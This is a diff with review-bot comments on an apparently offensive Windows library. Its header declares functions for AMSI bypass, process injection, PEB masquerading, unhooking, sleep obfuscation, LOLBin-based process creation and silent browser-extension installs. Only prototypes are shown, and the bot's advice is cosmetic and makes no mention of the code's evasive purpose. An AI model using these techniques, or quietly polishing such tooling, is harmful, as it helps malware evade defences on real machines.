||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="IsProcessRunningAsAdmin2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="IeCreateFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CaplockString.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="RtlInitAnsiString.cpp">
|
||||
<Filter>Source Files\String Manipulation\Windows Unicode Structure</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromMSHTML.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
|
@ -813,4 +843,7 @@
|
|||
<ItemGroup>
|
||||
<None Include="..\README.md" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="Notes.txt" />
|
||||
</ItemGroup>
|
||||
</Project>
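Review bot: `ExtractFilesFromCabIntoTarget.cpp` is placed under `Source Files\Windows API Helper Functions\Cryptography Related`, while the other new file-oriented sources in the same hunk (`IeCreateFile.cpp`, `DeleteDirectoryAndSubDataViaDelNode.cpp`, `DeleteFileWithCreateFileFlag.cpp`) go into `File Handling`, and the project already keeps compression helpers in a `Cryptography Related\Compression` subfilter. Cabinet extraction is neither cryptography nor a buffer-compression primitive like the `Lz*`/`Xpress*` helpers, so the consistent choice appears to be `<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>`. Filter files are regenerated by Visual Studio, so this is cosmetic, but it is what the Solution Explorer shows to anyone navigating the project.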
|
|
@ -1,4 +1,7 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LocalDebuggerCommandArguments>javascript:alert('hello');</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
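Review bot: The `.vcxproj.user` file in this section is a per-developer settings file, and the `LocalDebuggerCommandArguments` value `javascript:alert('hello');` reads as a leftover from locally debugging one of the URL-handling process-creation helpers rather than as project configuration. Visual Studio rewrites this file for each user, so checking it in makes every clone start the debugger with that argument and will generate churn whenever a contributor changes their own debug settings. It would be cleaner to drop it from the commit and add `*.vcxproj.user` to the repository's ignore list; if a shared default debug argument is genuinely wanted, a `<PropertyGroup>` in the main `.vcxproj` is the place to express it.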
|
|
@ -22,9 +22,9 @@
|
|||
#include <resapi.h>
|
||||
#include <amsi.h>
|
||||
#include <SetupAPI.h>
|
||||
#include <WbemCli.h>
|
||||
|
||||
|
||||
|
||||
#pragma comment(lib, "wbemuuid.lib")
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
#pragma comment(lib, "Iphlpapi.lib")
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
|
@ -272,8 +272,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID);
|
|||
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
|
||||
|
@ -330,35 +328,35 @@ BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInByt
|
|||
/*******************************************
|
||||
EVASION
|
||||
*******************************************/
|
||||
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
|
||||
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
|
||||
BOOL MasqueradePebAsExplorer(VOID);
|
||||
BOOL CreateFileFromDsCopyFromSharedFileW(_In_ PWCHAR NewFileName, _In_ PWCHAR FileToClone);
|
||||
BOOL CreateFileFromDsCopyFromSharedFileA(_In_ PCHAR NewFileName, _In_ PCHAR FileToClone);
|
||||
BOOL DelayedExecutionExecuteOnDisplayOff(VOID);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
|
||||
BOOL RemoveDllFromPebA(_In_ LPCSTR lpModuleName);
|
||||
BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
|
||||
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
|
||||
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
|
||||
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
|
||||
BOOL RemoveRegisterDllNotification(VOID);
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
|
||||
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
|
||||
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
|
||||
DWORD CreateProcessByWindowsRHotKeyW(_In_ PWCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyA(_In_ PCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExW(_In_ PWCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExA(_In_ PCHAR FullPathToBinary);
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
|
@ -369,12 +367,18 @@ BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCST
|
|||
BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile);
|
||||
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile);
|
||||
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand);
|
||||
|
||||
|
||||
|
||||
|
||||
|
@ -435,3 +439,16 @@ INT __demonstration_WinMain(VOID); //hook sleep
|
|||
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
|
||||
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory);
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory);
|
||||
BOOL IsProcessRunningAsAdmin2(VOID);
|
||||
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory);
|
||||
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory);
|
||||
|
||||
HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
|
||||
HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
|
||||
|
||||
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload);
|
||||
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath);
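Review bot: The prototypes added from `DeleteDirectoryAndSubDataViaDelNodeW` down to `CreateProcessFromWmiWin32_ProcessW` omit the SAL annotations the rest of this header uses (`_In_`/`_Out_` on the `GenericShellcode*` and `Mpf*` declarations just above), so `/analyze` and IntelliSense lose the null/direction contract on exactly the functions that take caller-supplied paths; e.g. `BOOL ExtractFilesFromCabIntoTargetW(_In_ LPCWSTR CabFile, _In_ LPCWSTR OutputDirectory);`. `IsProcessRunningAsAdmin2(VOID)` returns a bare `BOOL`, which cannot distinguish "not elevated" from "the underlying check failed"; a one-line comment stating what FALSE covers (and whether `GetLastError` is meaningful afterwards) would help any caller that gates privileged work on it. For `ExtractFilesFromCabIntoTargetW/A` the declaration should also state whether entry names inside the cabinet are confined to `OutputDirectory` or written as given, since a caller handing it an untrusted `.cab` needs to know which. The bodies of these functions are not in this hunk, so the behaviour itself cannot be checked here. Separately, in the earlier hunk of this file the `CreateProcess*` prototypes appear to remain under the `EVASION` banner while the filters file moves those sources to `Process Creation`; aligning the two would keep the header navigable.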
|